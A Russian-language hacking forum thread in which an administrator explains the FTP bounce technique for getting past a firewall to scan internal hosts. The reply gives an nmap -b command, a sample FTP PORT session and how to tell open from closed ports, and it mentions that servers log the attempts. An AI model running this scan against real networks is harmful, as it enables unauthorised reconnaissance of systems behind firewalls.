Атака FTP bounce (обход файрвола)

Discussion in 'Песочница' started by ProblemaT2, 14 May 2006.

  1. ProblemaT2

    ProblemaT2 New Member

    Joined:
    31 Mar 2006
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Возможно сканирование внутренней сети или подключение к внутренним ресурсам. Команда PORT

    Я так понял надо использовать nmap сканер. Какие команды nmap( под WINDOWS) надо посылать для сканирования внутренней сети или подключения к внутренним ресурсам?
     
    #1 ProblemaT2, 14 May 2006
    Last edited: 14 May 2006
  2. Rogun

    Rogun Elder - Старейшина

    Joined:
    12 Feb 2008
    Messages:
    76
    Likes Received:
    4
    Reputations:
    0
    Всё таки интересно было бы знать как подключится или сканировать внутренние ресурсы и тд. :)
     
  3. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    FTP bounce это не атака, а способ сканирования. Такой способ сканирования дает возможность обходить фильтры портов/режущие запросы файерволом, сканировать внутренние ресурсы.

    Все дело в волшебных пузырьках, т.е. в команде PORT, которая передается серверу для подготовки соединения с клиентом. "Особенность" PORT состоит в том, что передается не только порт, но и ип-адрес, что в совокупности с nmap-ом и дает возможность сканирования(nmap создает FTP-соединение и передает PORT команды(атакуемый хост, порт)).

    Сканирование 666.666.66.66:8080 с помощью хоста target.ru
    Code:
    nmap -b anonym@[COLOR=White]target.ru[/COLOR] -p [COLOR=White]8080[/COLOR] [COLOR=White]666.666.66.66[/COLOR]
    Соединение с FTP-сервером открыто, далее nmap пытается открыть следующее соединение: 666.666.66.66:8080
    Code:
    Server: 220 LAME_HOST FTP server version 4 ready
    Client: USER [COLOR=White]anonym[/COLOR]
    Server: 331 Guest login OK, send e-mail as password
    .......
    Server: 230 Login successful
    
    Client: PORT 666,666,66,66,[COLOR=White]31[/COLOR],[COLOR=White]144[/COLOR]
    Server: 200 PORT command successful
    Client: LIST
    Code:
    Client: PORT 666,666,66,66,[COLOR=White]31[/COLOR],[COLOR=White]144[/COLOR]
    Последние две цифры и представляют собой нужный нам порт(31*256+144=8080). При успешно выполненной команде PORT у нас появится возможность выполнить команду LIST, собственно это нам и говорит, что порт 8080 открыт. По сообщению "425 Can't build data connection" или "425 Can't open data connection" мы можем определить, что сканируемый порт закрыт. Но не стоит забывать про то, что FTP-сервера любят фиксировать соединение в журналах ^^

    Данная атака полностью зависит от того, как реализован FTP-сервер(присутствие передачи PORT только к оригинальному хосту отрежет эту возможность). На самом деле, все FTP-сервера, разработанные с соответствии RFC, должны реализовывать эту возможность, так же стоит знать, что у вас не будет возможность сканировать порты ниже 1024.

    Я реально устал описывать этот метод, надеюсь было понятно.

    Про:
    RFC
    Журналы
     
    _________________________
    #3 ettee, 18 Mar 2008
    Last edited: 18 Mar 2008
    3 people like this.